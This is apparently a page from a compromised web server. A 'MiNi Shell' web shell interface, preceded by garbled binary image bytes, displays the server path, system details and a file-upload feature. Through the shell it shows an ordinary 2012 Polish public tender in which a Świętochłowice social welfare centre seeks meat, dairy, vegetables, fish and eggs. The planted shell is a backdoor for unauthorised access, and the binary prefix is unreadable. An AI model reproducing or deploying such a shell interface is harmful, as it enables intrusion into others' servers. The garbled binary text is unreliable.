JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121030/424246-N-2012.html

<p class="kh_header"><b>Świętochłowice: DOSTAWA ARTKUŁÓW ŻYWNOŚCIOWYCH DLA OŚRODKA POMOCY SPOŁECZNEJ NA POTRZEBY ŻYWIENIA W PLACÓWKACH PODLEGŁYCH - W  PODZIALE  NA 5  PAKIETÓW</b><br>
<b>Numer ogłoszenia: 424246 - 2012; data zamieszczenia: 30.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Katowicka 35, 41-600 Świętochłowice, woj. śląskie, tel. 032 2455104, faks 032 2455104.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTKUŁÓW ŻYWNOŚCIOWYCH DLA OŚRODKA POMOCY SPOŁECZNEJ NA POTRZEBY ŻYWIENIA W PLACÓWKACH PODLEGŁYCH - W  PODZIALE  NA 5  PAKIETÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa artykułów żywnościowych dla Ośrodka Pomocy Społecznej  na potrzeby żywienia w placówkach podległych wraz z dostawą i rozładunkiem  w  magazynach Ośrodka Pomocy Społecznej w Świętochłowicach : 
Ośrodki Wsparcia - ul. Imieli 12,
Środowiskowy Dom Samopomocy-  ul. Karpacka 3.
2.	Przykładowy asortyment przedmiotu zamówienia określa załącznik nr 2 do niniejszej SIWZ - tabela
kosztów w zakresie każdego z 5 pakietów. Ilości artykułów podane w tabelach posiadają wartość szacunkową i będą uzależnione od aktualnych potrzeb Zamawiającego.
3.	Dostawy realizowane będą na podstawie zamówienia pisemnego przesyłanego faksem lub składanego telefonicznie w każdym następnym dniu po zgłoszeniu zamówienia lub w innym terminie uzgodnionym z Wykonawcą, w dni powszednie od poniedziałku do piątku w  godzinach od 07:00 do 15:00. 
4.	Wykonawca zobowiązany będzie do bezpłatnego dowozu towaru transportem spełniającym wymagania sanitarne oraz rozładunku wraz z wniesieniem do  magazynów  określonych w ust 1. niniejszego paragrafu.  
5.	Wykonawca  zobowiązany będzie dostarczać zamawiany towar bezwzględnie w dni wyznaczone przez Zamawiającego.
6.	Wykonawca zobowiązany będzie dostarczyć towar I klasy jakości, świeży, spełniający normy jakościowe (PN) dla danego asortymentu, wysokiej jakości sensorycznej i mikrobiologicznej.
7.	Każdy produkt musi być dopuszczony do obrotu i sprzedaży zgodnie z obowiązującymi  przepisami, oraz z warunkami określonymi w SIWZ, musi  posiadać początkowy  termin przydatności do spożycia.
8.	Wykonawca zabezpieczy należycie towar na czas przewozu (opakowania, pojemniki przystosowane do przewozu danego asortymentu) i ponosi całkowitą odpowiedzialność za dostawę i jakość dostarczonego towaru.
9.	Wykonawca weźmie na siebie odpowiedzialność za braki i wady powstałe w czasie transportu oraz poniesie z tego tytułu wszelkie skutki prawne.
10.	Przedmiot umowy Wykonawca zobowiązany jest wykonać zgodnie ze wzorem umowy ( załącznik nr 4 do SIWZ ) oraz SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5, 15.51.10.00-3, 15.55.10.00-5, 15.43.00.00-6, 15.30.00.00-1, 15.20.00.00-0, 03.31.10.00-2, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, na zasadzie spełnia - nie spełnia, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, na zasadzie spełnia - nie spełnia, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, na zasadzie spełnia - nie spełnia, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, na zasadzie spełnia - nie spełnia, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu  dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia o spełnianiu warunków  udziału w postępowaniu, na zasadzie spełnia - nie spełnia, zgodnie z załącznikiem nr 3 do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ops.swietochlowice.info<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świetochłowice, ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2012 godzina 09:00, miejsce: Świetochłowice, ul. Katowicka 35, pokój 304.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa mięsa i przetworów mięsnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Baleron gotowany	kg	  20		
Blok tostowy 	kg	 50		
Boczek wędzony 	kg	140		
Boczek z pieca	kg	  80		
Bułczanka  	kg	 35		
Frankfuterki	kg	 60		
Golonko prasowane	kg	130		
Karczek b/k	kg	800		
Kiełbasa biała 	kg	5		
Kiełbasa domowa 	kg	150		
Kiełbasa kanapkowa	kg	       140		
Kiełbasa kminkowa 	kg	120		
Kiełbasa krotoszyńska	kg	30		
Kiełbasa metka tradycyjna	kg	25		
Kiełbasa mortadela	kg	85		
Kiełbasa na rożno	kg	120		
Kiełbasa parówkowa	kg	800		
Kiełbasa podwawelska 	kg	150		
Kiełbasa śląska 	kg	       500		
Kiełbasa szynkowa	kg	       150		
Kiełbasa królewska wędzona	kg	       300		
Kiełbaski piwoszki	kg	250		
Kości świeże	kg	      1600		
Krupniok 	kg	       200		
Łopatka wieprzowa 	kg	600		
Łopatka wołowa/
pieczeń wołowa	kg	60		
Kiełbasa mielonka 	kg	       130		
Mięso gulaszowe wieprzowe 	kg	       850		
Nóżki wieprzowe	kg	80		
Ozory wieprzowe	kg	300		
Parówki delikatesowe 	kg	1000		
Pasztetowa extra  wędzona	kg	 120		
Pasztetowa biała 	kg	         30		
Płucka czyste	kg	140		
Polędwica drobiowa	kg	40		
Salceson ozorkowy	kg	90		
Salceson golonkowy 	kg	80		
Schab b/k	kg	         60		
Słonina świeża	kg	100		
Słonina wędzona	kg	         70		
Smalec	kg	50		
Szynka gotowana	kg	30		
Szynka wiejska	kg	10		
Wątroba wieprzowa	kg	40		
Gulasz wieprzowy paczkowany 
500 g	szt	6		
Gulasz wieprzowy paczkowany 
900 g	szt	6		
Wątrobianka 	kg	50		
Żeberka pasy	kg	        120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mleka i wyrobów mleczrskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser Jogutki   100  g
 lub równoważne
	szt.	  300	
Jogurt Jogobella 150g
 lub równoważne
	szt.	2500	
Jogurt naturalny 200g	szt.	 300	
Kefir - kubek 250g	szt.	 3000	
Margaryna mleczna 250g	szt.	2000	
Masło Extra 200g	szt.	9000	
Maślanka karton 1 l	szt.	   80	
Mleko 2% folia 0,9 l	szt.	      12070	
Mleko 2% karton 1 l	szt.	 220	
Mleko w proszku 0,5kg	szt.	  5 	
Ser biały półtłusty	kg	670	
Ser domowy	kg	145	
Serki Bakuś - różne smaki 100g  lub równoważne
	szt.	           20	
Serki topione 50 g - z szynką, 
ze szczypiorkiem, tylżycki 
	szt.	       9450	
Sery żółte - Gouda, Podlaski, Morski  lub równoważne	kg	400	
Śmietana 12% - kubek 0,2  l	szt.	870	
Śmietana 30% - folia 0,25  l	szt.	       1400	
Śmietanki jednorazowe 10 g	szt.	150	
Majonez 310g  
Kielecki lub równoważne	szt.	 200	
Majonez 280g 
Winiary lub równoważne
	szt.	 120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.10.00-3, 15.55.10.00-5, 15.54.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Banany	kg	100		
Botwinka	pęczek	150		
Brzoskwinie	kg	  30		
Buraki czerwone	kg	       1200		
Cebula	kg	590		
Cytryny	kg	  30		
Czosnek	kg	 85		
Grejpfrut czerwony	kg	 10		
Jabłka	kg	       1300		
Kalafior świeży	szt.	340		
Kalarepa	pęczek	540		
Kapusta biała	kg	       2050		
Kapusta czerwona	kg	520		
Kapusta kiszona	kg	       1500		
Kapusta pekińska	szt.	400		
Kapusta włoska	kg	100		
Kiwi	szt.	60		
Koperek zielony	pęczek	950		
Mandarynki	kg	120		
Marchew	kg	      1300		
Nektarynki	kg	40		
Ogórek zielony	kg	170		
Ogórki kiszone	kg	440		
Papryka czerwona	kg	 20		
Papryka żółta	kg	 10		
Pieczarki	kg	420		
Pietruszka korzeń	kg	 25		
Pietruszka zielona	pęczek	750		
Pomarańcze	kg	200		
Pomidory	kg	280		
Por	kg	 30		
Rzepa biała	kg	  3		
Rzodkiewka	pęczek	40		
Sałata zielona	szt.	        350		
Seler korzeń	kg	 80		
Szczypiorek	pęczek	95		
Szpinak świeży	kg	 10		
Śliwki	kg	  4		
Truskawki	kg	 80		
Winogrona białe	kg	65		
Ziemniaki	kg	26500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z czerniaka
 (jednokrotnie glazurowany)	kg	80	
Filet z  pangi
 (jednokrotnie glazurowany)	kg	320	
Filet z mintaja 
(jednokrotnie glazurowany)	kg	 30	
Filet z zielonego śledzia (jednokrotnie glazurowany)	kg	90	
Karp żywy	kg	 20	
Makrela wędzona 	kg	 80	
Śledź matjas  (lekko solony)	kg	       290.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 03.31.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze- klasa- wagowa M, klasa jakości A	szt.	40 160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com